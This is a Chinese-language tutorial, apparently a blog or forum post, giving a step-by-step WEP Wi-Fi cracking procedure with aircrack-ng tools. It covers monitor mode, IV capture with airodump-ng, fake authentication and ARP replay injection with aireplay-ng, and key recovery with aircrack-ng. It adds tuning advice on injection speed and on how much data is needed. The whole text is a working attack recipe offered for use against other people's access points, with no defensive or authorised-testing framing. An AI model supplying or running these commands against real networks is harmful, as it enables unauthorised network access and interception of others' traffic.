Linux WEP测试解析


1、首先

ifconfig -a

查看自己的网卡,我的是eth1,也有的是WLAN

2、ifconfig -a eth1 up

驱动自己的网卡

3、airmon-ng start eth1 6

开启自己网卡的监听模式,频道号为你要破解的AP的频道号。查看的方法很多,我就不细说了。

4、airodump-ng –ivs -w result -c 6 eth1

开始抓包,–ivs代表只抓IVS包,此处是两个“-”-w代表写入文件,后面我写的是result即抓到的包都保存在以result为文件名的文件中,-c代表频道,这里是6。

5、开另一shell窗口

伪装连接 aireplay-ng -1 0 -e apID -a apmac -h 网卡mac eth1

成功后 aireplay-ng -3 -b -apmac -h  网卡mac -x 30 eth1

运行后会显示

read **** packets(got 0 arp requests),sent 0 packets…

大家不要着急,这是没有ARP包,耐心等待。不过我破的有的等到10W多还是没用,建议换个时间试试。

-x 30这个是关键,-x是指定注入速度,这里是30,一般资料都是 -x 1024,但实际上4311在BT3使用1024的注入速度,的确是可以的,能达到4、500,不过过不了1、2秒,就提示

write failed: Cannot allocate memory

wi_write(): Illegal seek

注入就停了。在论坛上看帖子有人说30就能稳定,经实验的确如此。大家可以尝试提高这个数值,看最大能到多少。毕竟30还是比较慢的,我室友看优酷都能到 70多,不用注入,一会儿就够了。

6、等DATA到了15000左右

开另一shell窗口

aircrack-ng -n 64 -b 网卡mac result*.ivs

即可,如果没出密码,就是DATA不够,继续等几W个,再次运行。我的经验是10位纯数字密码3W内90%会出。

  • 1
  • 2
  • 3
  • 4
  • 5
  • 下一页

相关内容